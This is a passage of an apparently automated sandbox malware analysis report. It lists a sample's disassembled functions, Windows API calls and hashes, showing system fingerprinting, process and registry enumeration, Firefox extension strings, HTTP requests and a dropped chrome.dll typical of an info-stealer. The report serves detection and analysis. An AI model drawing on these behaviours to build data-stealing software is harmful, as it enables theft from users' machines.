                                                                                                                                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                                                                              • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                              • API String ID: 998311485-3310892237
                                                                                                                                              • Opcode ID: 89e3d854b8a0c1fb7171dc5eefa96b2b7ea12c6ca90577fb54480ee0b7e85999
                                                                                                                                              • Instruction ID: 3808d15f7e0f9f9184562117c9aa29465858450d569164ac2a98ea8b538c64df
                                                                                                                                              • Opcode Fuzzy Hash: 89e3d854b8a0c1fb7171dc5eefa96b2b7ea12c6ca90577fb54480ee0b7e85999
                                                                                                                                              • Instruction Fuzzy Hash: 42517E72E011089BCB04FBA1ECA6DED7339AF54304F40852EF50667195EF386A5CCB6A
                                                                                                                                              Function 00411C60 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                • Part of subcall function 00417690: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
                                                                                                                                                • Part of subcall function 00417690: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
                                                                                                                                                • Part of subcall function 00417690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
                                                                                                                                                • Part of subcall function 00417690: HeapAlloc.KERNEL32(00000000), ref: 0041779A
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                • Part of subcall function 00417820: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
                                                                                                                                                • Part of subcall function 00417820: HeapAlloc.KERNEL32(00000000), ref: 0041783B
                                                                                                                                                • Part of subcall function 00417950: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,009A0E28,00000000,?), ref: 00417982
                                                                                                                                                • Part of subcall function 00417950: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0041DEF0,000000FF,?,00411EE9,00000000,?,009A0E28,00000000,?), ref: 00417989
                                                                                                                                                • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                                                                                                                                • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                                                                                                                • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                                                                                                                                • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                                                                                                                • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                                                                                                                • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                                                                                                                • Part of subcall function 00417B10: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420DE8,00000000,?), ref: 00417B40
                                                                                                                                                • Part of subcall function 00417B10: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420DE8,00000000,?), ref: 00417B47
                                                                                                                                                • Part of subcall function 00417B10: GetLocalTime.KERNEL32(?,?,?,?,?,00420DE8,00000000,?), ref: 00417B54
                                                                                                                                                • Part of subcall function 00417B10: wsprintfA.USER32 ref: 00417B83
                                                                                                                                                • Part of subcall function 00417BC0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,009A04B0,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
                                                                                                                                                • Part of subcall function 00417BC0: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,009A04B0,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
                                                                                                                                                • Part of subcall function 00417BC0: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,009A04B0,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
                                                                                                                                                • Part of subcall function 00417C90: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,009A04B0,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417CC5
                                                                                                                                                • Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
                                                                                                                                                • Part of subcall function 00417D20: LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
                                                                                                                                                • Part of subcall function 00417D20: GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
                                                                                                                                                • Part of subcall function 00417D20: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
                                                                                                                                                • Part of subcall function 00417D20: LocalFree.KERNEL32(00000000), ref: 00417EB2
                                                                                                                                                • Part of subcall function 00417F10: GetSystemPowerStatus.KERNEL32(?), ref: 00417F3D
                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000000,?,009A0EC8,00000000,?,00420E0C,00000000,?,00000000,00000000,?,009A0438,00000000,?,00420E08,00000000), ref: 004122CE
                                                                                                                                                • Part of subcall function 00419600: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00419614
                                                                                                                                                • Part of subcall function 00419600: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00419635
                                                                                                                                                • Part of subcall function 00419600: CloseHandle.KERNEL32(00000000), ref: 0041963F
                                                                                                                                                • Part of subcall function 00417F90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
                                                                                                                                                • Part of subcall function 00417F90: HeapAlloc.KERNEL32(00000000), ref: 00417FCE
                                                                                                                                                • Part of subcall function 00417F90: RegOpenKeyExA.KERNEL32(80000002,0099C978,00000000,00020119,?), ref: 00417FEE
                                                                                                                                                • Part of subcall function 00417F90: RegQueryValueExA.KERNEL32(?,009A0EA8,00000000,00000000,000000FF,000000FF), ref: 0041800F
                                                                                                                                                • Part of subcall function 00417F90: RegCloseKey.ADVAPI32(?), ref: 00418022
                                                                                                                                                • Part of subcall function 004180F0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00418159
                                                                                                                                                • Part of subcall function 004180F0: GetLastError.KERNEL32 ref: 00418168
                                                                                                                                                • Part of subcall function 00418060: GetSystemInfo.KERNEL32(00420E14), ref: 00418090
                                                                                                                                                • Part of subcall function 00418060: wsprintfA.USER32 ref: 004180A6
                                                                                                                                                • Part of subcall function 00418290: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,009A03D8,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
                                                                                                                                                • Part of subcall function 00418290: HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,009A03D8,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
                                                                                                                                                • Part of subcall function 00418290: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
                                                                                                                                                • Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418302
                                                                                                                                                • Part of subcall function 00418290: __aulldiv.LIBCMT ref: 00418310
                                                                                                                                                • Part of subcall function 00418290: wsprintfA.USER32 ref: 0041833C
                                                                                                                                                • Part of subcall function 00418950: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E10,00000000,?), ref: 004189BF
                                                                                                                                                • Part of subcall function 00418950: HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E10,00000000,?), ref: 004189C6
                                                                                                                                                • Part of subcall function 00418950: wsprintfA.USER32 ref: 004189E0
                                                                                                                                                • Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,0099E248,00000000,00020019,00000000,004205BE), ref: 00418534
                                                                                                                                                • Part of subcall function 004184B0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                                                                                                                                • Part of subcall function 004184B0: wsprintfA.USER32 ref: 004185E9
                                                                                                                                                • Part of subcall function 004184B0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                                                                                                                                • Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                                                                                                                                • Part of subcall function 004184B0: RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                                                                                                                                • Part of subcall function 00418810: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
                                                                                                                                                • Part of subcall function 00418810: Process32First.KERNEL32(?,00000128), ref: 0041886E
                                                                                                                                                • Part of subcall function 00418810: Process32Next.KERNEL32(?,00000128), ref: 00418883
                                                                                                                                                • Part of subcall function 00418810: CloseHandle.KERNEL32(?), ref: 004188F1
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004128AB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$Process$Alloc$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$ComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
                                                                                                                                              • String ID: aA
                                                                                                                                              • API String ID: 2204142833-2414573348
                                                                                                                                              • Opcode ID: acd57c20a3c854a21eee446d3172dd153544f2ebc005042ad5384fa77216ffda
                                                                                                                                              • Instruction ID: 4f79722ab1709daed6719e9a1a5ed0a8a89ced1591e892962b9c5cf472760468
                                                                                                                                              • Opcode Fuzzy Hash: acd57c20a3c854a21eee446d3172dd153544f2ebc005042ad5384fa77216ffda
                                                                                                                                              • Instruction Fuzzy Hash: 9872ED72D15058AACB19FB91ECA1EEE733DAF10314F5042DFB11662056EF343B98CA69
                                                                                                                                              Function 00416D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009996C0,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                                                                                                                              • Sleep.KERNEL32(00001770), ref: 00416DA4
                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,009996C0,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                                                                                                                              • ExitProcess.KERNEL32 ref: 00416DC2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 941982115-0
                                                                                                                                              • Opcode ID: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
                                                                                                                                              • Instruction ID: 8f12dcb365d2fb80f233d5f720f30c8ba2b1eb9bf2b810d0bdce41a90926edfe
                                                                                                                                              • Opcode Fuzzy Hash: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
                                                                                                                                              • Instruction Fuzzy Hash: 46F08230B48219EFEB00BBA0EC0ABFE7375AF04705F15061BB516A51D0DBB89681CA5B
                                                                                                                                              Function 00415440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                                                                                                                                • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,009A2060), ref: 00406353
                                                                                                                                                • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                                                                                                                • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,009A1500,00000000,00000000,00400100,00000000), ref: 004063D5
                                                                                                                                                • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                                                                                                                • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                                                                                                              • String ID: ERROR$ERROR
                                                                                                                                              • API String ID: 3287882509-2579291623
                                                                                                                                              • Opcode ID: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
                                                                                                                                              • Instruction ID: 220a7b172e2a8d17d187597bbcd3bb12c7c2fc56be07e285a6b23909b802432f
                                                                                                                                              • Opcode Fuzzy Hash: 243c3ba6e4d083e298a404233cb39cc9641087610bb8f65c24bf72cb52f6143f
                                                                                                                                              • Instruction Fuzzy Hash: 6E118630A01048ABCB14FF65EC52EED33399F50354F40456EF90A5B4A2EF38AB95C65E
                                                                                                                                              Function 004152A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004152DA
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0648), ref: 004152F8
                                                                                                                                                • Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
                                                                                                                                                • Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                                                                              • String ID: 9dA
                                                                                                                                              • API String ID: 2699682494-3568425128
                                                                                                                                              • Opcode ID: f7895effc594b7d52b6f1f9c76fe9f72d0d10510d97b84fbaa25c1a372297da5
                                                                                                                                              • Instruction ID: 7a1763d3762e4bc1164bf129b3bea8c613207f41675935a6caeb9cdf66552cef
                                                                                                                                              • Opcode Fuzzy Hash: f7895effc594b7d52b6f1f9c76fe9f72d0d10510d97b84fbaa25c1a372297da5
                                                                                                                                              • Instruction Fuzzy Hash: 4E01D6B6E0520867CB14FB71EC53EDE733D9B54305F00419EB64996091EE78ABC8CBA5
                                                                                                                                              Function 004108ED Relevance: 4.7, APIs: 3, Instructions: 223fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,00999400), ref: 00410922
                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,00999430), ref: 00410B79
                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,009993D0), ref: 00410A0C
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                              • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DeleteFilelstrcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 273707478-0
                                                                                                                                              • Opcode ID: 9dc9acb3ca007911809e0bb5ea6d45069fc234d757c9900acfff30e5334c7348
                                                                                                                                              • Instruction ID: 55ebfe5bea072269aba33a565d8c59cbe62f1375a0798b8cb4aa3666f491b8e5
                                                                                                                                              • Opcode Fuzzy Hash: 9dc9acb3ca007911809e0bb5ea6d45069fc234d757c9900acfff30e5334c7348
                                                                                                                                              • Instruction Fuzzy Hash: EA916471B001089FCB18EF65DA95EED77B6EF94304F10816EE40A9F391DB349A49CB86
                                                                                                                                              Function 00419850 Relevance: 4.5, APIs: 3, Instructions: 48fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
                                                                                                                                              • WriteFile.KERNEL32(000000FF,004108DC,?,004108DC,00000000,?,004108DC), ref: 004198A3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CreateWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2263783195-0
                                                                                                                                              • Opcode ID: 87033afd89575812e055b209c04b4c4260860767bd957b8fe466ea0b568eb40e
                                                                                                                                              • Instruction ID: c00870ae4f46cd9ec0fbaadc8d13ab59566e93f84a6b66ec8604c729da6f8a20
                                                                                                                                              • Opcode Fuzzy Hash: 87033afd89575812e055b209c04b4c4260860767bd957b8fe466ea0b568eb40e
                                                                                                                                              • Instruction Fuzzy Hash: BE11C830A08248BBDB10EFA0DC15BDE7B795F05314F044199F655A72C1DB346B45C7DA
                                                                                                                                              Function 00417A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                                                                                                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
